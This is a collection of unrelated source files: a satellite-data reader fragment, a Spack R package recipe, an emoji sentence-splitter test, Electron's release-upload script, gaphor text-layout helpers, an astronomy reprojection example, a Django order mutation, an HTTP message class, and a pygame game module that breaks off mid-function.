CS_l1b_attrib['Waveform_20Hz'] = L1b_20Hz_SARIN_wfm_attributes
#-- return the output dictionary
return CS_l1b_attrib
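	#-- Note: a hedged sketch of applying the scaling documented above (the array
	#-- names are the fields described here, read separately from the product;
	#-- this function only builds attribute metadata, it does not compute this):
	#-- power_watts = Waveform * (Linear_Wfm_Multiplier*1e-9) * (2.0**Power2_Wfm_Multiplier)
	#-- i.e. Power in Watts = counts*(A*1e-9)*2^B for each 20 Hz record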
|
the-stack_106_23871 | # Copyright 2013-2022 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class RFlexclust(RPackage):
"""Flexible Cluster Algorithms.
The main function kcca implements a general framework for k-centroids
cluster analysis supporting arbitrary distance measures and centroid
computation. Further cluster methods include hard competitive learning,
neural gas, and QT clustering. There are numerous visualization methods for
cluster results (neighborhood graphs, convex cluster hulls, barcharts of
centroids, ...), and bootstrap methods for the analysis of cluster
stability."""
cran = "flexclust"
version('1.4-0', sha256='82fe445075a795c724644864c7ee803c5dd332a89ea9e6ccf7cd1ae2d1ecfc74')
version('1.3-5', sha256='dbf49969c93a7b314d9dc3299a0764ed9a804ba7dcbdc08a1235f244f4b85059')
depends_on('[email protected]:', type=('build', 'run'))
depends_on('r-lattice', type=('build', 'run'))
depends_on('r-modeltools', type=('build', 'run'))
depends_on('r-class', type=('build', 'run'))
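    # Example installation via Spack (illustrative, not part of the recipe):
    #   spack install [email protected]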
|
the-stack_106_23872 | #!/usr/bin/env python3
import unittest
from collections import namedtuple
from bunkai.algorithm.bunkai_sbd.annotator.emoji_annotator import EmojiAnnotator
from bunkai.base.annotation import Annotations
from .annotation_test_base import TestAnnotatorBase, TestInstance
MorphResult = namedtuple("MorphResult", ("input_text", "seq_newline_position"))
class TestMorphAnnotator(TestAnnotatorBase):
def setUp(self) -> None:
self.test_input = [
MorphResult("うーん🤔🤔🤔どうしよう", [6]),
MorphResult("ビール🍺のみたい。️Frankfurtの🍺はKrombacher", []),
MorphResult("これが文⬆️", [5]),
MorphResult("1文目😄2文目😚3文目😙4文目😄😙おわり。", [4, 8, 12, 17]),
]
def test_emoji_detector(self):
emoji_annotator = EmojiAnnotator()
for test_tuple in self.test_input:
ann = Annotations()
result = emoji_annotator.annotate(test_tuple.input_text, spans=ann)
self.assertEqual(set([s.end_index for s in result.get_final_layer()]), set(test_tuple.seq_newline_position))
def test_annotate(self):
test_input = [
TestInstance("うーん🤔🤔🤔どうしよう", n_sentence=2, expected_rules=[EmojiAnnotator.__name__]),
TestInstance("ビール🍺のみたい。️Frankfurtの🍺はKrombacher", n_sentence=2, expected_rules=[]),
TestInstance("これが文⬆️", n_sentence=1, expected_rules=[EmojiAnnotator.__name__]),
TestInstance("1文目😄2文目😚3文目😙4文目😄😙おわり。", n_sentence=5, expected_rules=[EmojiAnnotator.__name__]),
]
annotator = EmojiAnnotator()
self.is_check_test_instance(annotator=annotator, test_cases=test_input)
if __name__ == "__main__":
unittest.main()
|
the-stack_106_23873 | #!/usr/bin/env python
import argparse
import errno
import hashlib
import os
import shutil
import subprocess
import sys
import tempfile
from io import StringIO
from lib.config import PLATFORM, get_target_arch, get_env_var, s3_config, \
get_zip_name
from lib.util import electron_gyp, execute, get_electron_version, \
parse_version, scoped_cwd, s3put
from lib.github import GitHub
ELECTRON_REPO = 'electron/electron'
ELECTRON_VERSION = get_electron_version()
PROJECT_NAME = electron_gyp()['project_name%']
PRODUCT_NAME = electron_gyp()['product_name%']
SOURCE_ROOT = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))
OUT_DIR = os.path.join(SOURCE_ROOT, 'out', 'R')
DIST_DIR = os.path.join(SOURCE_ROOT, 'dist')
DIST_NAME = get_zip_name(PROJECT_NAME, ELECTRON_VERSION)
SYMBOLS_NAME = get_zip_name(PROJECT_NAME, ELECTRON_VERSION, 'symbols')
DSYM_NAME = get_zip_name(PROJECT_NAME, ELECTRON_VERSION, 'dsym')
PDB_NAME = get_zip_name(PROJECT_NAME, ELECTRON_VERSION, 'pdb')
def main():
args = parse_args()
if not args.publish_release:
if not dist_newer_than_head():
run_python_script('create-dist.py')
build_version = get_electron_build_version()
if not ELECTRON_VERSION.startswith(build_version):
error = 'Tag name ({0}) should match build version ({1})\n'.format(
ELECTRON_VERSION, build_version)
sys.stderr.write(error)
sys.stderr.flush()
return 1
github = GitHub(auth_token())
releases = github.repos(ELECTRON_REPO).releases.get()
tag_exists = False
for release in releases:
if not release['draft'] and release['tag_name'] == args.version:
tag_exists = True
break
release = create_or_get_release_draft(github, releases, args.version,
tag_exists)
if args.publish_release:
# Upload the Node SHASUMS*.txt.
run_python_script('upload-node-checksums.py', '-v', ELECTRON_VERSION)
# Upload the index.json.
run_python_script('upload-index-json.py')
# Create and upload the Electron SHASUMS*.txt
release_electron_checksums(github, release)
# Press the publish button.
publish_release(github, release['id'])
# TODO: run publish-to-npm script here
# Do not upload other files when passed "-p".
return
# Upload Electron with GitHub Releases API.
upload_electron(github, release, os.path.join(DIST_DIR, DIST_NAME))
upload_electron(github, release, os.path.join(DIST_DIR, SYMBOLS_NAME))
if PLATFORM == 'darwin':
upload_electron(github, release, os.path.join(DIST_DIR,
'electron-api.json'))
upload_electron(github, release, os.path.join(DIST_DIR, 'electron.d.ts'))
upload_electron(github, release, os.path.join(DIST_DIR, DSYM_NAME))
elif PLATFORM == 'win32':
upload_electron(github, release, os.path.join(DIST_DIR, PDB_NAME))
# Upload free version of ffmpeg.
ffmpeg = get_zip_name('ffmpeg', ELECTRON_VERSION)
upload_electron(github, release, os.path.join(DIST_DIR, ffmpeg))
# Upload chromedriver and mksnapshot for minor version update.
if parse_version(args.version)[2] == '0':
chromedriver = get_zip_name('chromedriver', ELECTRON_VERSION)
upload_electron(github, release, os.path.join(DIST_DIR, chromedriver))
mksnapshot = get_zip_name('mksnapshot', ELECTRON_VERSION)
upload_electron(github, release, os.path.join(DIST_DIR, mksnapshot))
if PLATFORM == 'win32' and not tag_exists:
# Upload PDBs to Windows symbol server.
run_python_script('upload-windows-pdb.py')
# Upload node headers.
run_python_script('create-node-headers.py', '-v', args.version)
run_python_script('upload-node-headers.py', '-v', args.version)
def parse_args():
parser = argparse.ArgumentParser(description='upload distribution file')
parser.add_argument('-v', '--version', help='Specify the version',
default=ELECTRON_VERSION)
parser.add_argument('-p', '--publish-release',
help='Publish the release',
action='store_true')
return parser.parse_args()
def run_python_script(script, *args):
script_path = os.path.join(SOURCE_ROOT, 'script', script)
return execute([sys.executable, script_path] + list(args))
def get_electron_build_version():
  if get_target_arch().startswith('arm') or 'CI' in os.environ:
# In CI we just build as told.
return ELECTRON_VERSION
if PLATFORM == 'darwin':
electron = os.path.join(SOURCE_ROOT, 'out', 'R',
'{0}.app'.format(PRODUCT_NAME), 'Contents',
'MacOS', PRODUCT_NAME)
elif PLATFORM == 'win32':
electron = os.path.join(SOURCE_ROOT, 'out', 'R',
'{0}.exe'.format(PROJECT_NAME))
else:
electron = os.path.join(SOURCE_ROOT, 'out', 'R', PROJECT_NAME)
return subprocess.check_output([electron, '--version']).strip()
def dist_newer_than_head():
with scoped_cwd(SOURCE_ROOT):
try:
head_time = subprocess.check_output(['git', 'log', '--pretty=format:%at',
'-n', '1']).strip()
dist_time = os.path.getmtime(os.path.join(DIST_DIR, DIST_NAME))
except OSError as e:
if e.errno != errno.ENOENT:
raise
return False
return dist_time > int(head_time)
def get_text_with_editor(name):
editor = os.environ.get('EDITOR', 'nano')
initial_message = '\n# Please enter the body of your release note for %s.' \
% name
  t = tempfile.NamedTemporaryFile('w', suffix='.tmp', delete=False)
t.write(initial_message)
t.close()
subprocess.call([editor, t.name])
text = ''
for line in open(t.name, 'r'):
if len(line) == 0 or line[0] != '#':
text += line
os.unlink(t.name)
return text
def create_or_get_release_draft(github, releases, tag, tag_exists):
# Search for existing draft.
for release in releases:
if release['draft']:
return release
if tag_exists:
tag = 'do-not-publish-me'
return create_release_draft(github, tag)
def create_release_draft(github, tag):
name = '{0} {1} beta'.format(PROJECT_NAME, tag)
  if 'CI' in os.environ:
body = '(placeholder)'
else:
body = get_text_with_editor(name)
if body == '':
sys.stderr.write('Quit due to empty release note.\n')
sys.exit(0)
data = dict(tag_name=tag, name=name, body=body, draft=True, prerelease=True)
r = github.repos(ELECTRON_REPO).releases.post(data=data)
return r
def release_electron_checksums(github, release):
checksums = run_python_script('merge-electron-checksums.py',
'-v', ELECTRON_VERSION)
upload_io_to_github(github, release, 'SHASUMS256.txt',
StringIO(checksums.decode('utf-8')), 'text/plain')
def upload_electron(github, release, file_path):
# Delete the original file before uploading in CI.
filename = os.path.basename(file_path)
  if 'CI' in os.environ:
try:
for asset in release['assets']:
if asset['name'] == filename:
github.repos(ELECTRON_REPO).releases.assets(asset['id']).delete()
except Exception:
pass
# Upload the file.
with open(file_path, 'rb') as f:
upload_io_to_github(github, release, filename, f, 'application/zip')
# Upload the checksum file.
upload_sha256_checksum(release['tag_name'], file_path)
# Upload ARM assets without the v7l suffix for backwards compatibility
# TODO Remove for 2.0
if 'armv7l' in filename:
arm_filename = filename.replace('armv7l', 'arm')
arm_file_path = os.path.join(os.path.dirname(file_path), arm_filename)
shutil.copy2(file_path, arm_file_path)
upload_electron(github, release, arm_file_path)
def upload_io_to_github(github, release, name, io, content_type):
params = {'name': name}
headers = {'Content-Type': content_type}
github.repos(ELECTRON_REPO).releases(release['id']).assets.post(
params=params, headers=headers, data=io, verify=False)
def upload_sha256_checksum(version, file_path):
bucket, access_key, secret_key = s3_config()
checksum_path = '{}.sha256sum'.format(file_path)
sha256 = hashlib.sha256()
with open(file_path, 'rb') as f:
sha256.update(f.read())
filename = os.path.basename(file_path)
with open(checksum_path, 'w') as checksum:
checksum.write('{} *{}'.format(sha256.hexdigest(), filename))
s3put(bucket, access_key, secret_key, os.path.dirname(checksum_path),
'atom-shell/tmp/{0}'.format(version), [checksum_path])
def publish_release(github, release_id):
data = dict(draft=False)
github.repos(ELECTRON_REPO).releases(release_id).patch(data=data)
def auth_token():
token = get_env_var('GITHUB_TOKEN')
message = ('Error: Please set the $ELECTRON_GITHUB_TOKEN '
'environment variable, which is your personal token')
assert token, message
return token
if __name__ == '__main__':
sys.exit(main())
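  # Example invocation (illustrative version tag; assumes this file lives in
  # the repository's script/ directory alongside the helpers it calls):
  #   script/upload.py -v v1.8.2 -p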
|
the-stack_106_23875 | """Support classes for dealing with text."""
from typing import Tuple, Union
import gi
from gaphas.canvas import instant_cairo_context
from gaphas.freehand import FreeHandCairoContext
from gaphas.geometry import Rectangle
from gaphas.painter import CairoBoundingBoxContext
from gaphor.core.styling import FontStyle, FontWeight, Style, TextAlign, TextDecoration
# fmt: off
gi.require_version('PangoCairo', '1.0') # noqa: isort:skip
from gi.repository import GLib, Pango, PangoCairo # noqa: isort:skip
# fmt: on
class Layout:
def __init__(
self, text="", font=None, text_align=TextAlign.CENTER, default_size=(0, 0),
):
self.layout = PangoCairo.create_layout(instant_cairo_context())
self.underline = False
self.font_id = None
self.text = ""
self.width = -1
self.default_size = default_size
if font:
self.set_font(font)
if text:
self.set_text(text)
self.set_alignment(text_align)
def set(self, text=None, font=None, width=None, text_align=None):
        # Since text expressions can return False, we should also accommodate for that
if text not in (None, False):
self.set_text(text)
if font:
self.set_font(font)
if width is not None:
self.set_width(width)
if text_align:
self.set_alignment(text_align)
def set_font(self, font: Style):
font_family = font.get("font-family")
font_size = font.get("font-size")
font_weight = font.get("font-weight")
font_style = font.get("font-style")
assert font_family, "Font family should be set"
assert font_size, "Font size should be set"
font_id = (font_family, font_size, font_weight, font_style)
if font_id == self.font_id:
return
self.font_id = font_id
fd = Pango.FontDescription.new()
fd.set_family(font_family)
fd.set_absolute_size(font_size * Pango.SCALE)
if font_weight:
assert isinstance(font_weight, FontWeight)
fd.set_weight(getattr(Pango.Weight, font_weight.name))
if font_style:
assert isinstance(font_style, FontStyle)
fd.set_style(getattr(Pango.Style, font_style.name))
self.layout.set_font_description(fd)
underline = (
font.get("text-decoration", TextDecoration.NONE) == TextDecoration.UNDERLINE
)
if self.underline != underline:
self.underline = underline
self.update_text()
def set_text(self, text: str):
if text != self.text:
self.text = text
self.update_text()
def update_text(self):
if self.underline:
# TODO: can this be done via Pango attributes instead?
self.layout.set_markup(
f"<u>{GLib.markup_escape_text(self.text)}</u>", length=-1
)
else:
self.layout.set_text(self.text, length=-1)
def set_width(self, width: int):
self.width = width
if width == -1:
self.layout.set_width(-1)
else:
self.layout.set_width(int(width * Pango.SCALE))
def set_alignment(self, text_align: TextAlign):
self.layout.set_alignment(getattr(Pango.Alignment, text_align.name))
def size(self):
if not self.text:
return self.default_size
self.set_width(self.width)
return self.layout.get_pixel_size()
def show_layout(self, cr, width=None, default_size=None):
layout = self.layout
if not self.text:
return default_size or self.default_size
if width is not None:
layout.set_width(int(width * Pango.SCALE))
if isinstance(cr, FreeHandCairoContext):
PangoCairo.show_layout(cr.cr, layout)
elif isinstance(cr, CairoBoundingBoxContext):
w, h = layout.get_pixel_size()
cr.rel_line_to(w, h)
cr.stroke()
else:
PangoCairo.show_layout(cr, layout)
def focus_box_pos(
bounding_box: Rectangle,
text_size: Tuple[Union[float, int], Union[float, int]],
text_align: TextAlign,
) -> Tuple[int, int]:
"""Calculate the focus box position based on alignment style."""
x, y, width, height = bounding_box
w, h = text_size
if text_align is TextAlign.CENTER:
x += (width - w) / 2
elif text_align is TextAlign.RIGHT:
x += width - w
y += (height - h) / 2
return x, y
def text_point_at_line(points, size, text_align):
"""Provide a position (x, y) to draw a text close to a line.
Parameters:
- points: the line points, a list of (x, y) points
- size: size of the text, a (width, height) tuple
    - text_align: alignment relative to the line: LEFT places the text at the beginning of the line, CENTER at the middle segment, RIGHT at the end
"""
if text_align == TextAlign.LEFT:
p0 = points[0]
p1 = points[1]
x, y = _text_point_at_line_end(size, p0, p1)
elif text_align == TextAlign.CENTER:
p0, p1 = middle_segment(points)
x, y = _text_point_at_line_center(size, p0, p1)
elif text_align == TextAlign.RIGHT:
p0 = points[-1]
p1 = points[-2]
x, y = _text_point_at_line_end(size, p0, p1)
return x, y
def middle_segment(points):
"""Get middle line segment."""
m = len(points) // 2
assert m >= 1 and m < len(points)
return points[m - 1], points[m]
def _text_point_at_line_end(size, p1, p2):
"""Calculate position of the text relative to a line defined by points p1
and p2.
Parameters:
- size: text size, a (width, height) tuple
- p1: beginning of line segment
- p2: end of line segment
"""
name_dx = 0.0
name_dy = 0.0
ofs = 5
dx = float(p2[0]) - float(p1[0])
dy = float(p2[1]) - float(p1[1])
name_w, name_h = size
if dy == 0:
rc = 1000.0 # quite a lot...
else:
rc = dx / dy
abs_rc = abs(rc)
h = dx > 0 # right side of the box
v = dy > 0 # bottom side
if abs_rc > 6:
# horizontal line
if h:
name_dx = ofs
name_dy = -ofs - name_h
else:
name_dx = -ofs - name_w
name_dy = -ofs - name_h
elif 0 <= abs_rc <= 0.2:
# vertical line
if v:
name_dx = -ofs - name_w
name_dy = ofs
else:
name_dx = -ofs - name_w
name_dy = -ofs - name_h
else:
# Should both items be placed on the same side of the line?
r = abs_rc < 1.0
# Find out alignment of text (depends on the direction of the line)
align_left = h ^ r
align_bottom = v ^ r
if align_left:
name_dx = ofs
else:
name_dx = -ofs - name_w
if align_bottom:
name_dy = -ofs - name_h
else:
name_dy = ofs
return p1[0] + name_dx, p1[1] + name_dy
# hint tuples to move text depending on quadrant
WIDTH_HINT = (-1, -1, 0)
PADDING_HINT = (1, 1, -1)
EPSILON = 1e-6
def _text_point_at_line_center(size, p1, p2):
"""Calculate position of the text relative to a line defined by points p1
and p2.
Parameters:
- size: text size, a (width, height) tuple
- p1: beginning of line
- p2: end of line
"""
x0 = (p1[0] + p2[0]) / 2.0
y0 = (p1[1] + p2[1]) / 2.0
dx = p2[0] - p1[0]
dy = p2[1] - p1[1]
ofs = 3
if abs(dx) < EPSILON:
d1 = -1.0
d2 = 1.0
elif abs(dy) < EPSILON:
d1 = 0.0
d2 = 0.0
else:
d1 = dy / dx
d2 = abs(d1)
width, height = size
# move to center and move by delta depending on line angle
if d2 < 0.5774: # <0, 30>, <150, 180>, <-180, -150>, <-30, 0>
# horizontal mode
w2 = width / 2.0
hint = w2 * d2
x = x0 - w2
y = y0 + hint + ofs
else:
# much better in case of vertical lines
# determine quadrant, we are interested in 1 or 3 and 2 or 4
# see hint tuples below
h2 = height / 2.0
q = (d1 > 0) - (d1 < 0)
hint = 0 if abs(dx) < EPSILON else h2 / d2
x = x0 - (ofs + hint) * PADDING_HINT[q] + width * WIDTH_HINT[q]
y = y0 - h2
return x, y
|
the-stack_106_23877 | __author__ = 'socuialmoneydev'
from ConfigParser import SafeConfigParser
import os.path
import base64
class Connection(object):
defaultApiKey = None
defaultApiSecret = None
defaultDomainName = None
defaultProxyServer = None
defaultProxyPort = None
defaultConfigFilePath = os.path.join(os.path.dirname(__file__), '..', 'config.ini')
@staticmethod
def createFromConfig(configFilePath = None):
c = Connection(configFilePath)
c.apiKey = Connection.defaultApiKey
c.apiSecret = Connection.defaultApiSecret
c.domainName = Connection.defaultDomainName
c.proxyServer = Connection.defaultProxyServer
c.proxyPort = Connection.defaultProxyPort
return c
def __init__(self, configFilePath = None):
configFile = configFilePath or Connection.defaultConfigFilePath
if Connection.defaultApiKey == None and os.path.isfile(configFile):
parser = SafeConfigParser()
parser.read(configFile)
Connection.defaultApiKey = parser.get('CorePro', 'CoreProApiKey')
Connection.defaultApiSecret = parser.get('CorePro', 'CoreProApiSecret')
Connection.defaultDomainName = parser.get('CorePro', 'CoreProDomainName')
Connection.defaultProxyServer = parser.get('CorePro', 'CoreProProxyServer')
Connection.defaultProxyPort = parser.get('CorePro', 'CoreProProxyPort')
self.apiKey = Connection.defaultApiKey
self.apiSecret = Connection.defaultApiSecret
self.domainName = Connection.defaultDomainName
self._headerValue = None
self.proxyServer = Connection.defaultProxyServer
self.proxyPort = Connection.defaultProxyPort
@property
def headerValue(self):
if self._headerValue == None:
b64 = base64.b64encode(unicode("{0}:{1}".format(self.apiKey, self.apiSecret)))
self._headerValue = "Basic {0}".format(b64)
return self._headerValue
|
the-stack_106_23878 | """Example how to reproject by interpolation.
"""
import numpy as np
from astropy.io import fits
from astropy.wcs import WCS
from wcsaxes import datasets
from reproject.interpolation import reproject_celestial_slices
# Test 2d interpolation, different frame, different projection
hdu = datasets.msx_hdu()
hdu.data[100:200, 100:200] = np.inf
wcs_in = WCS(hdu.header)
wcs_out = wcs_in.deepcopy()
wcs_out.wcs.ctype = ['RA---TAN', 'DEC--TAN']
wcs_out.wcs.crval = [266.44707, -28.937888]
array_out = reproject_celestial_slices(hdu.data, wcs_in, wcs_out, hdu.data.shape)
fits.writeto('test_2d.fits', array_out,
header=wcs_out.to_header(), clobber=True)
# Test 3d slice-by-slice interpolation, different frame, different projection
hdu = datasets.l1448_co_hdu()
wcs_in = WCS(hdu.header)
wcs_in.wcs.equinox = 2000.
wcs_out = wcs_in.deepcopy()
wcs_out.wcs.ctype = ['GLON-SIN', 'GLAT-SIN', wcs_in.wcs.ctype[2]]
wcs_out.wcs.crval = [158.0501, -21.530282, wcs_in.wcs.crval[2]]
wcs_out.wcs.crpix = [50., 50., wcs_in.wcs.crpix[2]]
array_out = reproject_celestial_slices(hdu.data, wcs_in, wcs_out, hdu.data.shape)
fits.writeto('test_3d.fits', array_out,
header=wcs_out.to_header(), clobber=True)
|
the-stack_106_23879 | import time
from beeline_navigator import explore
from natsort import natsorted
from os import listdir
from os.path import isfile, join
def get_valid_wad_paths(wad_dir):
all_files = [f for f in listdir(wad_dir) if isfile(join(wad_dir, f))]
wad_files = [f for f in all_files if f.endswith('wad')]
wad_paths = [join(wad_dir, f) for f in wad_files]
wad_paths = natsorted(wad_paths)
return wad_paths
default_cfg_path = './explorer.cfg'
wad_dir = '../../data/maps/out'
wad_paths = get_valid_wad_paths(wad_dir)
num_explorations = 5
for idx, wad_path in enumerate(wad_paths):
wad_id = wad_path.split('/')[-1].split('_')[1]
start = time.time()
for i in range(num_explorations):
explore(default_cfg_path, wad_path, i,
lmp_out_dir='../../data/exploration')
end = time.time()
elapsed_time = end - start
print('Finished exploring map {} for {} times in {}s'.format(
idx, num_explorations, elapsed_time
))
|
the-stack_106_23882 | import typing
from urllib.parse import urljoin
import strawberry
from django.conf import settings
from django.utils.translation import gettext_lazy as _
from api.permissions import IsAuthenticated
from conferences.models.conference import Conference
from hotels.models import HotelRoom, HotelRoomReservation
from pretix import CreateOrderHotelRoom, CreateOrderInput, Order, create_order
from pretix.exceptions import PretixError
@strawberry.type
class CreateOrderResult:
payment_url: str
@strawberry.type
class Error:
message: str
@strawberry.type
class OrdersMutations:
@strawberry.mutation(permission_classes=[IsAuthenticated])
def create_order(
self, info, conference: str, input: CreateOrderInput
) -> typing.Union[CreateOrderResult, Error]:
conference_obj = Conference.objects.get(code=conference)
validation_error = validate_hotel_rooms(
input.hotel_rooms, conference=conference_obj
)
if validation_error:
return validation_error
try:
pretix_order = create_order(conference_obj, input)
except PretixError as e:
return Error(message=e.message)
if len(input.hotel_rooms) > 0:
create_hotel_reservations(
pretix_order, input.hotel_rooms, user_id=info.context.request.user.id
)
return_url = urljoin(
settings.FRONTEND_URL,
f"/{input.locale}/orders/{pretix_order.code}/confirmation",
)
if pretix_order.payment_url is None:
return CreateOrderResult(payment_url=return_url)
payment_url = pretix_order.payment_url
payment_url += f"?return_url={return_url}"
return CreateOrderResult(payment_url=payment_url)
def validate_hotel_rooms(hotel_rooms: typing.List[CreateOrderHotelRoom], *, conference):
count_rooms = {}
conference_start = conference.start.date()
conference_end = conference.end.date()
for order_room in hotel_rooms:
try:
room = HotelRoom.objects.get(id=order_room.room_id, conference=conference)
except HotelRoom.DoesNotExist:
return Error(
message=_("Room %(id)s not found") % {"id": order_room.room_id}
)
if room.is_sold_out:
return Error(
message=_("Room %(id)s is sold out") % {"id": order_room.room_id}
)
count = count_rooms.get(room.pk, 0)
if count + 1 > room.capacity_left:
return Error(message=_("Too many rooms") % {"id": order_room.room_id})
count_rooms[room.pk] = count + 1
if order_room.checkin < conference_start or order_room.checkin > conference_end:
return Error(message=_("Invaild check-in date"))
if (
order_room.checkout < conference_start
or order_room.checkout > conference_end
or order_room.checkin > order_room.checkout
):
return Error(message=_("Invaild check-out date"))
def create_hotel_reservations(
pretix_order: Order, hotel_rooms: typing.List[CreateOrderHotelRoom], user_id: int
):
for room in hotel_rooms:
HotelRoomReservation.objects.create(
room_id=room.room_id,
order_code=pretix_order.code,
checkin=room.checkin,
checkout=room.checkout,
user_id=user_id,
)
|
the-stack_106_23883 | class ClientMessage:
HTTP_VERSION="HTTP/1.1"
HTTP_HEADERS={
"Host": "cs5700sp17.ccs.neu.edu"
}
def __init__(self, method, URL, headers, body=""):
""" Init the variables of the client message """
self.method=method
self.URL=URL
self.body=body
self.version=ClientMessage.HTTP_VERSION
self.headers=ClientMessage.HTTP_HEADERS.copy()
self.headers.update(headers)
        try:
            self.headers["Content-length"] = len(body)
        except Exception:
            raise ValueError("Could not set Content-length header on client message")
def __str__(self):
"""Transfer the message into string to send to server"""
firstLine=""+str(self.method)+" "+str(self.URL)+" "+str(self.version)
headers=[]
for key in self.headers:
new_header_line=""+str(key)+":"+str(self.headers[key])
headers.append(new_header_line)
headersLines="\n".join(headers)
result="\n".join([firstLine,headersLines,"",self.body])
result+="\n"
return result
|
the-stack_106_23884 | '''Manages the game mechanics.'''
import random
import pygame
import pytmx
import pyscroll
import app
from pygame.constants import K_1, K_2
from characters import NinjaPlayer, NinjaEnemy, ArcherPlayer, ArcherEnemy, BanditPlayer, BanditEnemy, keymap1, keymap2
from items import LifePotionSmall, Axe, Bow, Knife, Sword, Portal
from collisions import get_collision_grid, get_positions_in_grid, get_objects_in_range
def update():
    '''Makes the game seem alive and responsive.'''
global keys_pressed
    keys_pressed = pygame.key.get_pressed() # Needed for handling keyboard and mouse events
# Processing inputs
process_inputs()
# Updating things in the game
render_group.update() #Updating the relative position of the entities to the camera.
update_collisions()
update_objects()
# If all players died, re-run last map
if len(players)==0: load_map(last_map_loaded, reset_players=True)
def update_objects():
for o in animated_objects:
o.update()
def process_inputs():
'''Input processing related to the game as a whole.'''
global keys_pressed
if keys_pressed[K_1]:
renderer.zoom *= 1.05
if keys_pressed[K_2]:
renderer.zoom /= 1.05
def update_collisions():
    '''Updates collisions between sprites, in a completely inefficient way.'''
global hitboxes, collisionable_sprites
# Update collisions between characters
grid = get_collision_grid(collisionable_sprites, map)
for a in collisionable_sprites:
for b in get_objects_in_range(a, grid, map):
if a is b: continue
a.bounce(b)
b.bounce(a)
# Update hitboxes
for h in hitboxes:
for o in get_objects_in_range(h, grid, map):
if h.colliderect(o.feet_rect):
o.hitted(h)
# TODO: Restore this
hitboxes = list()
# Update collisions between characters and items
for b in touchable_objects:
b.set_animation('stand')
grid = get_collision_grid(touchable_objects, map)
for a in collisionable_sprites:
for b in get_objects_in_range(a, grid, map):
b.touched_by(a)
def draw():
'''Draws all the entities and the background.'''
app.screen.fill((0, 0, 0))
# center the map/screen on our Heroes
if len(players)>1:
center = ((players[0].rect.centerx + players[1].rect.centerx)*0.5,
(players[0].rect.centery+players[1].rect.centery)*0.5)
render_group.center(center)
elif len(players)==1:
render_group.center(players[0].rect.center)
else:
render_group.center((0,0))
# draw the map and all sprites
render_group._spritelist.sort(key=lambda x: x.feet_rect.centery) #Sorting sprites by depth.
render_group.draw(app.screen)
# Draw information about players' life, stamina, etc.
draw_players_info()
# # TODO: CLEAN THIS CODE WHEN DEBUGGING CHARACTERS IS NO LONGER NEEDED
# # Raw way of rendering things for debuging
# camx = -player1.rect.centerx+app.screen_width*0.5
# camy = -player1.rect.centery+app.screen_height*0.5
#
# for h in hitboxes:
# rect = (h.rect[0]+camx, h.rect[1]+camy, h.rect[2], h.rect[3])
# pygame.draw.rect(app.screen, (255, 0, 0), rect)
# hitboxes = list()
#
# for e in animated_objects:
# rect = (e.feet_rect[0]+camx, e.feet_rect[1]+camy, e.feet_rect[2], e.feet_rect[3])
# pygame.draw.rect(app.screen, (0, 255, 0), rect)
def draw_players_info():
render_group.center((0,0))
# Player 1 info
if len(players)>0:
pygame.draw.rect(app.screen, ( 0, 0, 0), (20, 20, 200, 20))
if players[0].life > 0: pygame.draw.rect(app.screen, (255, 0, 0), (23, 23, 194*max(0,players[0].life)/players[0].max_life, 14))
pygame.draw.rect(app.screen, ( 0, 0, 0), (20, 40, 200, 20))
pygame.draw.rect(app.screen, (255,255,255), (23, 43, 194*max(0,players[0].stamina)/players[0].max_stamina, 14))
# Player 2 info
if len(players)>1:
pygame.draw.rect(app.screen, ( 0, 0, 0), (app.screen_width-20-200, 20, 200, 20))
if players[1].life > 0: pygame.draw.rect(app.screen, (255, 0, 0), (app.screen_width-17-200, 23, 194*players[1].life/players[1].max_life, 14))
pygame.draw.rect(app.screen, ( 0, 0, 0), (app.screen_width-20-200, 40, 200, 20))
pygame.draw.rect(app.screen, (255,255,255), (app.screen_width-17-200, 43, 194*max(0, players[1].stamina)/players[1].max_stamina, 14))
# Loading main map
def load_map(path, reset_players=False):
global map, map_rect, renderer
global render_group, animated_objects, collisionable_sprites, hitboxes, touchable_objects, collisionable_walls, players, grid_collisionable_walls
global last_map_loaded
last_map_loaded = path
# Load the map
map = pytmx.util_pygame.load_pygame(path)
map_rect = (0, 0, map.width*map.tilewidth, map.height*map.tileheight)
# Load music and start playing it
if hasattr(map, 'music'):
pygame.mixer.music.load('data/music/' + map.music)
pygame.mixer.music.play(-1)
else:
pygame.mixer.music.stop()
# Creating global containers
renderer = pyscroll.BufferedRenderer(pyscroll.data.TiledMapData(map), app.screen.get_size()) # "Camera" of the game: it renders objects.'''
renderer.zoom = 1.5
render_group = pyscroll.group.PyscrollGroup(map_layer=renderer, default_layer=2) # This defines the group of renderizable sprites.
animated_objects = list() # Holds everything that needs to be updated by PygAnim.
collisionable_sprites = list() # Sprites that can collide between them
hitboxes = list() # Hitbox objects
touchable_objects = list()
# Creating objects of the map
# Walls
collisionable_walls = [pygame.Rect(o.x,o.y, o.width,o.height) for o in map.layernames['walls']] # This contains the walls of the map
grid_collisionable_walls = get_collision_grid(collisionable_walls, map, size=10) #Used for optimization
# Characters
old_players = players if players is not None else []
players = []
for map_object in map.layernames['characters']:
# Selecting keyboard
key = keymap1 if len(players) == 0 else keymap2
# Creating the object
if map_object.class_ninja == 'true':
if map_object.is_player == 'true':
new_character = NinjaPlayer(key)
players.append(new_character)
else:
new_character = NinjaEnemy()
elif map_object.class_archer == 'true':
if map_object.is_player == 'true':
new_character = ArcherPlayer(key)
players.append(new_character)
else:
new_character = ArcherEnemy()
elif map_object.class_bandit == 'true':
if map_object.is_player == 'true':
new_character = BanditPlayer(key)
players.append(new_character)
else:
new_character = BanditEnemy()
# Setting attributes
# Position
new_character.position = (map_object.x - 50, map_object.y - 45)
# Weapons
weapon_list = []
if map_object.weapon_unarmed == 'true': weapon_list.append('unarmed')
if map_object.weapon_knife == 'true': weapon_list.append('knife')
if map_object.weapon_sword == 'true': weapon_list.append('sword')
if map_object.weapon_axe == 'true': weapon_list.append('axe')
if map_object.weapon_bow == 'true': weapon_list.append('bow')
if len(weapon_list)>0:
new_character.weapon = random.choice(weapon_list)
else:
new_character.weapon = 'unarmed'
# Things for NPCs:
if map_object.is_player == 'false':
# Wandering zones
new_character.territory_radius = float(map_object.territory_radius) * map.tilewidth
# Patroling zones (for NPCs):
if hasattr(map_object, 'points'):
new_character.path = list()
for p in map_object.points:
new_character.path.append((p[0], p[1]))
new_character.position = (new_character.path[0][0]-50, new_character.path[0][1]-45)
if not reset_players:
